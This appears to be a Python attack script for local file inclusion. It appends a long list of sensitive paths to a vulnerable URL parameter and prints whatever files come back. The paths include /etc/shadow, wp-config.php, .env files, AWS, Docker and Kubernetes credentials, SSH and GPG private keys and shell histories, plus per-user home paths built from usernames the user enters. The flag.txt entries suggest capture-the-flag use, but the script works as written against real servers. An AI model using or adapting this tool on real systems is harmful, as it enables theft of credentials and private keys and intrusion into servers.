import requests

# Common file paths for LFI attacks
file_paths = [
    

"/var/www/html/wordpress/wp-config.php",
"/var/www/html/wordpress/wp-admin",
"/var/www/html/wordpress/wp-admin/index.php",
"/var/www/html/wordpress/wp-admin/admin.php",
"/var/www/html/wordpress/wp-admin/update-core.php",
"/var/www/html/wordpress/wp-admin/post-new.php",
"/var/www/html/wordpress/wp-admin/edit.php",
"/var/www/html/wordpress/wp-admin/upload.php",
"/var/www/html/wordpress/wp-admin/users.php",
"/var/www/html/wordpress/wp-admin/options-general.php",
"/var/www/html/wordpress/wp-admin/options-writing.php",
"/var/www/html/wordpress/wp-admin/options-reading.php",
"/var/www/html/wordpress/wp-admin/options-discussion.php",
"/var/www/html/wordpress/wp-admin/options-media.php",
"/var/www/html/wordpress/wp-admin/options-permalink.php",
"/var/www/html/wordpress/wp-includes",
"/var/www/html/wordpress/wp-includes/functions.php",
"/var/www/html/wordpress/wp-includes/load.php",
"/var/www/html/wordpress/wp-includes/version.php",
"/var/www/html/wordpress/wp-includes/plugin.php",
"/var/www/html/wordpress/wp-includes/ms-functions.php",
"/var/www/html/wordpress/wp-includes/ms-settings.php",
"/var/www/html/wordpress/wp-includes/kses.php",
"/var/www/html/wordpress/wp-includes/rest-api.php",
"/var/www/html/wordpress/wp-content",
"/var/www/html/wordpress/wp-content/plugins",
"/var/www/html/wordpress/wp-content/themes",
"/var/www/html/wordpress/wp-content/uploads",
"/var/www/html/wordpress/.htaccess",
"/var/www/html/wordpress/xmlrpc.php",
"/var/www/html/wordpress/license.txt",
"/var/www/html/wordpress/readme.html",
"/var/www/html/wordpress/wp-load.php",
"/var/www/html/wordpress/wp-settings.php",
"/var/www/html/wordpress/wp-login.php",
"/var/www/html/wordpress/wp-cron.php",
"/var/www/html/wordpress/wp-signup.php",
"/var/www/html/wordpress/wp-mail.php",
"/var/www/html/wordpress/wp-activate.php",
"/var/www/html/wordpress/wp-comments-post.php",
"/var/www/html/wordpress/wp-links-opml.php",
"/var/www/html/wordpress/wp-trackback.php",
"/var/www/html/wordpress/wp-admin/network",
"/var/www/html/wordpress/wp-admin/network/index.php",
"/var/www/html/wordpress/wp-admin/network/site-new.php",
"/var/www/html/wordpress/wp-admin/network/sites.php",
"/var/www/html/wordpress/wp-admin/network/users.php",
"/var/www/html/wordpress/wp-admin/network/themes.php",
"/var/www/html/wordpress/wp-admin/network/plugins.php",
"/var/www/html/wordpress/wp-admin/network/settings.php",
"/var/www/html/wordpress/wp-admin/network/upgrade.php",

"/var/www/html/wp-config.php",
"/var/www/html/wp-admin",
"/var/www/html/wp-admin/index.php",
"/var/www/html/wp-admin/admin.php",
"/var/www/html/wp-includes",
"/var/www/html/wp-includes/functions.php",
"/var/www/html/wp-includes/load.php",
"/var/www/html/wp-includes/version.php",
"/var/www/html/wp-includes/plugin.php",
"/var/www/html/wp-content",
"/var/www/html/wp-content/plugins",
"/var/www/html/wp-content/themes",
"/var/www/html/wp-content/uploads",
"/var/www/html/.htaccess",
"/var/www/html/xmlrpc.php",
"/var/www/html/license.txt",
"/var/www/html/readme.html",
"/var/www/html/wp-load.php",
"/var/www/html/wp-settings.php",
"/var/www/html/wp-login.php",
"/var/www/html/wp-cron.php",
"/var/www/html/wp-signup.php",
"/var/www/html/wp-mail.php",
"/var/www/html/wp-activate.php",
"/var/www/html/wp-comments-post.php",
"/var/www/html/wp-links-opml.php",
"/var/www/html/wp-trackback.php",

"/etc/passwd",
    "/etc/shadow",
    "/etc/group",
    "/etc/hosts",
    "/etc/apache2/apache2.conf",
    "/var/log/apache2/access.log",
    "/var/log/nginx/access.log",
    "/var/log/messages",
    "/etc/httpd/httpd.conf",
    "/etc/nginx/nginx.conf",
    "/var/log/apache2/access.log",
    "/var/log/httpd/access_log",
    "/var/log/nginx/access.log",
    "/var/log/auth.log",
    "/var/log/messages",
    "/var/log/syslog",
    "/var/log/apache2/access.log",
    "/var/log/apache2/error.log",
    "/var/log/httpd/access_log",
    "/var/log/httpd/error_log",
    "/var/log/nginx/access.log",
    "/var/log/nginx/error.log",
    "/var/log/lighttpd/access.log",
    "/var/log/lighttpd/error.log",
    "/var/log/mail.log",
    "/var/log/mail.info",
    "/var/log/mail.warn",
    "/var/log/mail.err",
    "/var/log/messages",
    "/var/log/secure",
    "/var/log/kern.log",
    "/var/log/cron.log",
    "/var/log/dpkg.log",
    "/var/log/yum.log",
    "/var/log/daemon.log",
    "/var/log/alternatives.log",
    "/var/log/lastlog",
    "/var/log/wtmp",
    "/var/log/btmp",
    "/var/log/faillog",
    "/var/log/postgresql/postgresql-[0-9]*.log",
    "/etc/my.cnf",
    "/etc/mongodb.conf",
    "/etc/redis/redis.conf",
    "/var/lib/mysql/mysql.sock",
    "/var/lib/mysql/",
    "/etc/php.ini",
    "/var/www/html/wp-config.php",
    "/var/www/wp-config.php",
    "/var/www/wp-includes/wp-db.php",
    "/var/www/wp-content/debug.log",
    "/var/www/wp-admin/admin-ajax.php",
    "/var/www/html/configuration.php",
    "/var/www/html/sites/default/settings.php",
    "/var/www/html/app/config/parameters.yml",
    "/var/www/html/.env",
    "/var/www/html/wp-includes/wp-db.php",
    "/var/www/html/wp-content/debug.log",
    "/var/www/html/wp-admin/admin-ajax.php",
    "/etc/sudoers",
    "/etc/ssh/sshd_config",
    "/etc/crontab",
    "/etc/fstab",
    "/etc/exports",
    "/etc/network/interfaces",
    "/etc/resolv.conf",
    "/etc/sysctl.conf",
    "/var/log/apache/access.log",
    "/var/log/apache/error.log",
    "/var/log/apache2/access.log",
    "/var/log/apache2/error.log",
    "/var/log/httpd/access.log",
    "/var/log/httpd/error.log",
    "/usr/local/apache2/logs/access_log",
    "/usr/local/apache2/logs/error_log"
]

# Prompt user for usernames and append known user locations
usernames = []
while True:
    username = input("Enter a username (leave blank to finish): ")
    if not username:
        break
    usernames.append(username)

for username in usernames:
    file_paths.extend([
        f"/home/{username}/flag.txt",
	f"/home/{username}/passwords.txt",
	f"/home/{username}/password.txt"
	f"/home/{username}/Desktop/password.txt",
	f"/home/{username}/Desktop/passwords.txt",
        f"/home/{username}/.ssh",
        f"/home/{username}/.bash_history",
        f"/home/{username}/.ssh/authorized_keys",
        f"/home/{username}/.ssh/id_rsa",
        f"/home/{username}/.ssh/id_rsa.pub",
        f"/home/{username}/.ssh/known_hosts",
        f"/home/{username}/.profile",
        f"/home/{username}/.viminfo",
	f"/home/{username}/.mysql_history",
        f"/home/{username}/.psql_history",
        f"/home/{username}/.gitconfig",
        f"/home/{username}/.config/gcloud/configurations/config_default",
        f"/home/{username}/.aws/credentials",
        f"/home/{username}/.aws/config",
        f"/home/{username}/.docker/config.json",
        f"/home/{username}/.npmrc",
        f"/home/{username}/.htpasswd",
        f"/home/{username}/.local/share/keyrings",
	f"/home/{username}/.ssh/id_dsa",
    	f"/home/{username}/.ssh/id_dsa.pub",
    	f"/home/{username}/.ssh/id_ecdsa",
    	f"/home/{username}/.ssh/id_ecdsa.pub",
    	f"/home/{username}/.ssh/id_ed25519",
    	f"/home/{username}/.ssh/id_ed25519.pub",
    	f"/home/{username}/.ssh/config",
    	f"/home/{username}/.gnupg",
    	f"/home/{username}/.gnupg/pubring.kbx",
    	f"/home/{username}/.gnupg/secring.gpg",
    	f"/home/{username}/.gnupg/private-keys-v1.d",
    	f"/home/{username}/.jupyter/jupyter_notebook_config.py",
    	f"/home/{username}/.kube/config",
    	f"/home/{username}/.ansible/ansible.cfg",
    	f"/home/{username}/.config/fish/fish_history",
    	f"/home/{username}/.config/Code/User/settings.json",
    	f"/home/{username}/.config/Code/User/keybindings.json",
    	f"/home/{username}/.config/rclone/rclone.conf",
    	f"/home/{username}/.config/ranger/rc.conf",
    	f"/home/{username}/.ssh/known_hosts",
f"/root/flag.txt",
f"/root/passwords.txt",
f"/root/password.txt",
f"/root/Desktop/password.txt",
f"/root/Desktop/passwords.txt",
f"/root/.ssh",
f"/root/.bash_history",
f"/root/.ssh/authorized_keys",
f"/root/.ssh/id_rsa",
f"/root/.ssh/id_rsa.pub",
f"/root/.ssh/known_hosts",
f"/root/.profile",
f"/root/.viminfo",
f"/root/.mysql_history",
f"/root/.psql_history",
f"/root/.gitconfig",
f"/root/.config/gcloud/configurations/config_default",
f"/root/.aws/credentials",
f"/root/.aws/config",
f"/root/.docker/config.json",
f"/root/.npmrc",
f"/root/.htpasswd",
f"/root/.local/share/keyrings",
f"/root/.ssh/id_dsa",
f"/root/.ssh/id_dsa.pub",
f"/root/.ssh/id_ecdsa",
f"/root/.ssh/id_ecdsa.pub",
f"/root/.ssh/id_ed25519",
f"/root/.ssh/id_ed25519.pub",
f"/root/.ssh/config",
f"/root/.gnupg",
f"/root/.gnupg/pubring.kbx",
f"/root/.gnupg/secring.gpg",
f"/root/.gnupg/private-keys-v1.d",
f"/root/.jupyter/jupyter_notebook_config.py",
f"/root/.kube/config",
f"/root/.ansible/ansible.cfg",
f"/root/.config/fish/fish_history",
f"/root/.config/Code/User/settings.json",
f"/root/.config/Code/User/keybindings.json",
f"/root/.config/rclone/rclone.conf",
f"/root/.config/ranger/rc.conf",
f"/root/.ssh/known_hosts",
	f"/var/spool/cron/crontabs/{username}",
        f"/var/mail/{username}",
        f"/etc/sysconfig/network-scripts/ifcfg-{username}",
    ])

# Prompt user for the base URL
base_url = input("Enter the base URL (e.g. http://172.16.1.10/nav.php?page=): ")

# Iterate through the file paths and attempt to retrieve content
for file_path in file_paths:
    url = base_url + file_path
    print(f"Trying {url}")
    try:
        response = requests.get(url)
        if response.status_code == 200:
            print(f"Success! Contents of {file_path}:")
            print(response.text)
            print("\n" + "-" * 80 + "\n")
        else:
            print(f"Failed to access {file_path} (Status code: {response.status_code})")
    except requests.exceptions.RequestException as e:
        print(f"Error: {e}")

print("Finished scanning.")
